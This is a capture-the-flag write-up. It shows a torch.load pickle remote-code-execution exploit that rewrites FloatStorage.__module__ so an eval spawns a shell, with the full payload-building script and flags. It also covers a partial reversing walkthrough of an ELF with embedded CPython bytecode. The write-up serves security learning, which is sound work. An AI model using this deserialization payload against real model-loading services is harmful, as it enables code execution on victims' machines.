This challenge is the fixed version of the previous one; it simply sets _legacy_load to None:

71,75c71,73
< _legacy_load_co_consts = list(torch.serialization._legacy_load.__code__.co_consts)
< unpickler_co_consts = list(_legacy_load_co_consts[7].co_consts)
< unpickler_co_consts[1] = UnpicklerWrapper.find_class.__code__
< _legacy_load_co_consts[7] = _legacy_load_co_consts[7].replace(co_consts=tuple(unpickler_co_consts))
< torch.serialization._legacy_load.__code__ = torch.serialization._legacy_load.__code__.replace(co_consts=tuple(_legacy_load_co_consts))
---
> 
> # old stuff is dangerous
> torch.serialization._legacy_load = None

So, we can only use the new _load (source code here), which only uses UnpicklerWrapper to load the pickle. Its co_consts are patched, making find_class the fixed version, so no simple unintended solution is possible. We need to find a usable class from the allowed list.

Reading some code, we find torch.storage._TypedStorage interesting because its __new__ has a code path that executes eval():

                return _TypedStorage(
                    *args,
                    dtype=cls.dtype,
                    device='cuda' if eval(cls.__module__) is torch.cuda else 'cpu')

PS: This eval was patched a few days before the competition, but the default pip version wasn't fixed yet.

Reading the code, we see that entering that path requires cls != _LegacyStorage, cls != _TypedStorage, and len(args) == 0, after which it calls eval(cls.__module__). Researching the storage-related code, we find that _LegacyStorage is a subclass of _TypedStorage, and classes like torch.FloatStorage inherit from _LegacyStorage. To pass the cls checks, we need to use classes such as torch.FloatStorage or torch.ByteStorage.

Testing torch.FloatStorage() confirms it enters the eval path, so modifying torch.FloatStorage.__module__ achieves code execution.

In pickle, we know the BUILD opcode (source) modifies attributes based on the state format, using either __dict__ or setattr. However, a class __dict__ is a mappingproxy, which doesn't support direct modification:

>>> import torch
>>> torch.FloatStorage.__dict__['__module__'] = 'asd'
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: 'mappingproxy' object does not support item assignment

But using setattr works:

>>> import torch
>>> setattr(torch.FloatStorage, '__module__', 'asd')
>>> torch.FloatStorage.__module__
'asd'
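Both BUILD paths can be observed with hand-written pickle bytes and no torch at all. The sketch below uses a stand-in class Target in a fake module demo_mod (both hypothetical) and relies on the standard pickle behaviour that a plain dict state is written through __dict__, while a (state, slotstate) tuple applies slotstate with setattr.

```python
import pickle
import sys
import types


class Target:
    pass


# Register a fake module so the GLOBAL opcode can resolve demo_mod.Target.
demo_mod = types.ModuleType("demo_mod")
demo_mod.Target = Target
sys.modules["demo_mod"] = demo_mod

push_class = b"cdemo_mod\nTarget\n"            # GLOBAL: push the class
push_dict = b"}V__module__\nVpatched\ns"       # {"__module__": "patched"}

dict_state = push_class + push_dict + b"b."              # BUILD with a dict
slot_state = push_class + b"N" + push_dict + b"\x86b."   # BUILD with (None, dict)

try:
    pickle.loads(dict_state)
    dict_path_error = None
except TypeError as exc:
    # Writing into the class __dict__ (a mappingproxy) is rejected.
    dict_path_error = exc

pickle.loads(slot_state)  # slotstate entries are applied with setattr
print(repr(dict_path_error), Target.__module__)
```

This is why the (None, {...}) tuple form is the one that works for changing __module__ on a class.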

So, modifying __module__ requires the setattr version of BUILD. This matters because I used splitline/Pickora to simplify generating pickle bytecode, and by default it modifies attributes using BUILD with __dict__ (source). So I added a BUILD macro to Pickora:

        def macro_build(args):
            assert(len(args) == 2)
            self.bytecode += pickle.MARK
            self.traverse(args[0])
            self.traverse(args[1])
            self.bytecode += b'b'
        macro_handler['BUILD'] = macro_build

I could have modified Pickora's attribute-handling code directly instead. I later found out that Pickora originally used the setattr form, and that this behavior was changed by a later patch.
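The difference between the two BUILD state forms can be reproduced with the standard pickle module alone. This is a minimal sketch, assuming a hypothetical module demo_mod with a class Target in place of torch.FloatStorage; the payload is assembled by hand rather than with Pickora.

```python
import pickle
import sys
import types

# Hypothetical module and class, registered so that the GLOBAL opcode can
# import them by name.
demo_mod = types.ModuleType("demo_mod")


class Target:
    pass


Target.__module__ = "demo_mod"
demo_mod.Target = Target
sys.modules["demo_mod"] = demo_mod


def build_payload(state):
    """Push demo_mod.Target, push `state`, then apply BUILD to the class."""
    push_class = pickle.GLOBAL + b"demo_mod\nTarget\n"
    push_state = pickle.dumps(state, protocol=0)[:-1]  # drop trailing STOP
    return push_class + push_state + pickle.BUILD + pickle.STOP


# A plain dict state goes through Target.__dict__, a read-only mappingproxy.
try:
    pickle.loads(build_payload({"__module__": "asd"}))
    dict_form_error = None
except TypeError as exc:
    dict_form_error = exc

# A (None, slotstate) tuple goes through setattr and succeeds.
result = pickle.loads(build_payload((None, {"__module__": "asd"})))
```

The dict form fails with the same mappingproxy TypeError shown earlier, while the tuple form leaves Target.__module__ set to 'asd'. This is why the macro is called with (None, {...}) as its second argument.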

Using the patched Pickora to compile the following code generates the RCE payload:

from torch import FloatStorage
BUILD(FloatStorage, (None, {"__module__": "__import__('os').system('sh')"}))
FloatStorage()

Here's the complete code:

import sys

sys.path.insert(0, "./Pickora")
from compiler import Compiler
import torch
import pickle
import base64
import secrets
import os
import zipfile


class UnpicklerWrapper:
    def find_class(self, module, name):
        if module + "." + name in (
            "builtins.set",
            "collections.OrderedDict",
            "torch.nn.modules.activation.LogSigmoid",
            "torch.nn.modules.activation.LogSoftmax",
            "torch.nn.modules.activation.ReLU",
            "torch.nn.modules.activation.Sigmoid",
            "torch.nn.modules.activation.Softmax",
            "torch.nn.modules.batchnorm.BatchNorm1d",
            "torch.nn.modules.batchnorm.BatchNorm2d",
            "torch.nn.modules.batchnorm.BatchNorm3d",
            "torch.nn.modules.conv.Conv1d",
            "torch.nn.modules.conv.Conv2d",
            "torch.nn.modules.conv.ConvTranspose1d",
            "torch.nn.modules.conv.ConvTranspose2d",
            "torch.nn.modules.dropout.Dropout2d",
            "torch.nn.modules.dropout.Dropout3d",
            "torch.nn.modules.flatten.Flatten",
            "torch.nn.modules.linear.Linear",
            "torch.nn.modules.loss.BCELoss",
            "torch.nn.modules.loss.BCEWithLogitsLoss",
            "torch.nn.modules.loss.CrossEntropyLoss",
            "torch.nn.modules.loss.L1Loss",
            "torch.nn.modules.loss.MSELoss",
            "torch.nn.modules.pooling.AvgPool2d",
            "torch.nn.modules.pooling.MaxPool2d",
            "torch._utils._rebuild_parameter",
            "torch._utils._rebuild_tensor_v2",
            "torch.Size",
            "torch.BFloat16Storage",
            "torch.BoolStorage",
            "torch.CharStorage",
            "torch.ComplexDoubleStorage",
            "torch.ComplexFloatStorage",
            "torch.HalfStorage",
            "torch.IntStorage",
            "torch.LongStorage",
            "torch.QInt32Storage",
            "torch.QInt8Storage",
            "torch.QUInt8Storage",
            "torch.ShortStorage",
            "torch.storage._StorageBase",
            "torch.ByteStorage",
            "torch.DoubleStorage",
            "torch.FloatStorage",
            "torch._C.HalfStorageBase",
            "torch._C.QInt32StorageBase",
            "torch._C.QInt8StorageBase",
            "torch.storage._TypedStorage",
        ):
            return super().find_class(module, name)
        else:
            raise Exception("Hacking detected!")


# replace find_class with our safe one
_load_co_consts = list(torch.serialization._load.__code__.co_consts)
unpickler_co_consts = list(_load_co_consts[7].co_consts)
unpickler_co_consts[1] = UnpicklerWrapper.find_class.__code__
_load_co_consts[7] = _load_co_consts[7].replace(co_consts=tuple(unpickler_co_consts))
torch.serialization._load.__code__ = torch.serialization._load.__code__.replace(co_consts=tuple(_load_co_consts))

# old stuff is dangerous
torch.serialization._legacy_load = None

pkl = Compiler(
    source="""
from torch import FloatStorage
BUILD(FloatStorage,(None,{"__module__": "__import__('os').system('sh')"}))
FloatStorage()
"""
).compile()
with zipfile.ZipFile("out", "w", zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("archive/version", b"3")
    zf.writestr("archive/data.pkl", pkl)

model = torch.load("out")
print(model)
# (base64 out | tr -d '\n'; echo; cat) | python arson.py
# (base64 out | tr -d '\n'; echo; cat) | nc mc.ax 31064
# (base64 out | tr -d '\n'; echo; cat) | nc mc.ax 31065
# arson: hope{pr1ckly_pickl3s}
# reckless arson: hope{m4ny_more_pr1cklier_pickles}

A zip file is used because the new serialization format is just a zip archive containing archive/version and archive/data.pkl. You can see this by saving something with torch.save and inspecting the result.
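The layout can be sketched with the standard library only. This is an illustration under assumptions: build_archive is a hypothetical helper, the pickled dict is a harmless placeholder, and only the two entry names and the version value come from the exploit script above. Whether torch.load accepts a given archive depends on the torch version.

```python
import io
import pickle
import zipfile


def build_archive(pkl: bytes) -> bytes:
    """Wrap raw pickle bytes in the two-entry zip layout used by the exploit."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("archive/version", b"3")
        zf.writestr("archive/data.pkl", pkl)
    return buf.getvalue()


# Harmless placeholder payload instead of the compiled Pickora bytecode.
blob = build_archive(pickle.dumps({"hello": "world"}, protocol=2))

# Reading it back shows the entries and recovers the pickle stream.
with zipfile.ZipFile(io.BytesIO(blob)) as zf:
    names = zf.namelist()
    restored = pickle.loads(zf.read("archive/data.pkl"))
```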

rev

better-llvm

This challenge involves reversing an ELF file, which is a flag checker. Running it reveals it embeds CPython.

First, it uses fgets to read a 21-character string and checks if the first character is h. Then, after Py_Initialize(), it uses PyRun_StringFlags to execute:

def dicegang():
    x = input().encode()
    for (a, b) in zip(x, bytes.fromhex('4e434e0a53455f0a584f4b4646530a5e424344410a435e0d4e0a484f0a5e424b5e0a4f4b5953')):
        if a ^ 42 != b:
            return False
        return True
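As a quick check, the hex constant in this function can be decoded by undoing the XOR with 42. The snippet below only uses the constant shown above; the variable names are mine.

```python
# Constant copied from the embedded dicegang source.
blob = bytes.fromhex(
    "4e434e0a53455f0a584f4b4646530a5e424344410a435e0d4e0a484f0a5e424b5e0a4f4b5953"
)

# The check is `a ^ 42 != b`, so XORing each byte with 42 recovers the
# input that the function compares against.
decoded = bytes(b ^ 42 for b in blob).decode()
print(decoded)
```

It prints "did you really think it'd be that easy", so this source is a decoy rather than the real check.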

Next, it extracts the dicegang code object and modifies many of its fields, including co_consts and co_code. Finally, it uses PyRun_StringFlags to execute the following code to check the flag:

if dicegang():
    print('ok fine you got the flag')
else:
    print('nope >:)')

Clearly, by this point, the dicegang function is no longer the original function. We need to dump the bytecode. The method is simple: replace the string literal with exec(input()) and write it to a new ELF. The only requirement is that the new string length must be less than or equal to the original.
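The in-place replacement can be sketched as follows. This is a hedged illustration: patch_literal is a hypothetical helper, the fake_elf bytes stand in for the real binary, the exact bytes of the literal in the ELF are an assumption, and padding with spaces is one choice that keeps the length unchanged while remaining valid Python source.

```python
def patch_literal(blob: bytes, old: bytes, new: bytes, pad: bytes = b" ") -> bytes:
    """Overwrite `old` with `new` in place, padding so that no offsets shift."""
    if len(new) > len(old):
        raise ValueError("replacement must not be longer than the original")
    if blob.count(old) != 1:
        raise ValueError("expected exactly one occurrence of the literal")
    return blob.replace(old, new.ljust(len(old), pad))


# Stand-in for the ELF contents; a real run would read the binary from disk.
old_src = (
    b"if dicegang():\n"
    b"    print('ok fine you got the flag')\n"
    b"else:\n"
    b"    print('nope >:)')\n"
)
fake_elf = b"\x7fELF" + b"\x00" * 16 + old_src + b"\x00" + b"\x90" * 8
patched = patch_literal(fake_elf, old_src, b"exec(input())")
```

Keeping the total length identical means every other offset in the file stays valid, which is why the replacement must not be longer than the original string.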

Then, running import dis;dis.dis(dicegang) fails with IndexError: tuple index out of range, indicating something is wrong. Dumping co_code, co_varnames, co_names, and co_consts shows:

          0 LOAD_CONST               4 (4)
          2 LOAD_CONST               0 (0)
          4 ROT_TWO
          6 BINARY_SUBSCR
          8 LOAD_CONST               1 (1)
         10 ROT_TWO
         12 BINARY_SUBSCR
         14 UNPACK_SEQUENCE          2
         16 STORE_FAST               0 (0)
         18 STORE_FAST               1 (1)
         20 LOAD_CONST               5 (5)
         22 LOAD_CONST               6 (6)
         24 BUILD_SLICE              0
         26 LOAD_CONST               0 (0)
         28 ROT_TWO
         30 BINARY_SUBSCR
         32 GET_ITER
    >>   34 FOR_ITER                57 (to 150)
         36 LOAD_CONST               1 (1)
         38 ROT_TWO
         40 BINARY_SUBSCR
         42 UNPACK_SEQUENCE          2
         44 STORE_FAST               2 (2)
         46 STORE_FAST               3 (3)
         48 LOAD_FAST                2 (2)
         50 LOAD_FAST                0 (0)
         52 BINARY_SUBTRACT
         54 STORE_FAST               2 (2)
         56 LOAD_FAST                3 (3)
         58 LOAD_FAST                1 (1)
         60 BINARY_SUBTRACT
         62 STORE_FAST               3 (3)
         64 LOAD_CONST               1 (1)
         66 GET_ITER
    >>   68 FOR_ITER                27 (to 124)
         70 LOAD_CONST               1 (1)
         72 ROT_TWO
         74 BINARY_SUBSCR
         76 UNPACK_SEQUENCE          2
         78 STORE_FAST               4 (4)
         80 STORE_FAST               5 (5)
         82 LOAD_FAST                4 (4)
         84 LOAD_FAST                0 (0)
         86 BINARY_SUBTRACT
         88 STORE_FAST               4 (4)
         90 LOAD_FAST                5 (5)
         92 LOAD_FAST                1 (1)
         94 BINARY_SUBTRACT
         96 STORE_FAST               5 (5)
         98 LOAD_FAST                2 (2)
        100 LOAD_FAST                5 (5)
        102 BINARY_MULTIPLY
        104 LOAD_FAST                3 (3)
        106 LOAD_FAST                4 (4)
        108 BINARY_MULTIPLY
        110 BINARY_SUBTRACT
        112 LOAD_CONST               4 (4)
        114 COMPARE_OP               5 (>=)
        116 POP_JUMP_IF_TRUE        61 (to 122)
        118 LOAD_CONST               2 (2)
        120 RETURN_VALUE
    >>  122 JUMP_ABSOLUTE           34 (to 68)
    >>  124 LOAD_FAST                2 (2)
        126 LOAD_FAST                0 (0)
        128 BINARY_ADD
        130 STORE_FAST               2 (2)
        132 LOAD_FAST                3 (3)
        134 LOAD_FAST                1 (1)
        136 BINARY_ADD
        138 STORE_FAST               3 (3)
        140 LOAD_FAST                2 (2)
        142 STORE_FAST               0 (0)
        144 LOAD_FAST                3 (3)
        146 STORE_FAST               1 (1)
        148 JUMP_ABSOLUTE           17 (to 34)
    >>  150 LOAD_CONST               3 (3)
        152 RETURN_VALUE

co_varnames = ()
co_names = ()
co_consts = ('haaaaaaaaaaaaaaaaaaaa', {'a': (13, 22), 'b': (-13, -9), 'c': (42, 15), 'd': (40, 0), 'e': (-47, 8), 'f': (-20, -29), 'g': (14, -36), 'h': (-1, 48), 'i': (9, -27), 'j': (42, -22), 'k': (-34, -9), 'l': (44, -5), 'm': (46, 1), 'n': (22, -39), 'o': (-25, 42), 'p': (-44, 14), 'q': (8, 14), 'r': (1, 2), 's': (-17, -39), 't': (-14, 31), 'u': (9, 21), 'v': (43, -18), 'w': (40, 12), 'x': (33, 9), 'y': (-28, 25), 'z': (10, -17), 'A': (35, -20), 'B': (4, -32), 'C': (-42, -22), 'D': (21, 19), 'E': (3, 26), 'F': (-8, -6), 'G': (-32, -2), 'H': (-18, -42), 'I': (27, -39), 'J': (-10, 26), 'K': (4, 41), 'L': (-21, 34), 'M': (-27, 10), 'N': (13, -47), 'O': (11, -47), 'P': (-33, -34), 'Q': (-13, -33), 'R': (26, -34), 'S': (36, -29), 'T': (-27, -40), 'U': (-13, -42), 'V': (42, 23), 'W': (-32, -24), 'X': (-12, -23), 'Y': (-29, -39), 'Z': (8, 30), '0': (34, 8), '1': (-37, -13), '2': (25, 38), '3': (-34, -7), '4': (-13, 13), '5': (1, -25), '6': (-30, 33), '7': (27, -10), '8': (-5, 37), '9': (37, 1), '_': (20, -46), '{': (-49, -2), '}': (9, 45)}, False, True, 0, 1, None)

The problem is that STORE_FAST and LOAD_FAST access local variable slots up to index 5 while co_varnames is empty, so dis cannot look up their names. Padding co_varnames to a tuple of 6 names makes the disassembly work:

dicegang.__code__ = dicegang.__code__.replace(co_varnames=('a','b','c','d','e','f'));import dis;dis.dis(dicegang)
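The number of names needed can also be derived mechanically from the raw listing. The helper below is a small sketch of that reasoning, with required_locals as a hypothetical name and a few lines copied from the dump above as sample input.

```python
import re


def required_locals(listing: str) -> int:
    """Return how many local slots the LOAD_FAST/STORE_FAST operands imply."""
    indices = [
        int(m.group(1))
        for m in re.finditer(r"\b(?:LOAD|STORE)_FAST\s+(\d+)", listing)
    ]
    return max(indices) + 1 if indices else 0


# A few lines taken from the disassembly of the raw co_code.
sample = """\
         16 STORE_FAST               0 (0)
         46 STORE_FAST               3 (3)
         80 STORE_FAST               5 (5)
        100 LOAD_FAST                5 (5)
"""
count = required_locals(sample)

# Placeholder names for the padded co_varnames tuple.
names = tuple(chr(ord("a") + i) for i in range(count))
```

The highest slot index is 5, so six placeholder names are enough, matching the tuple passed to replace above.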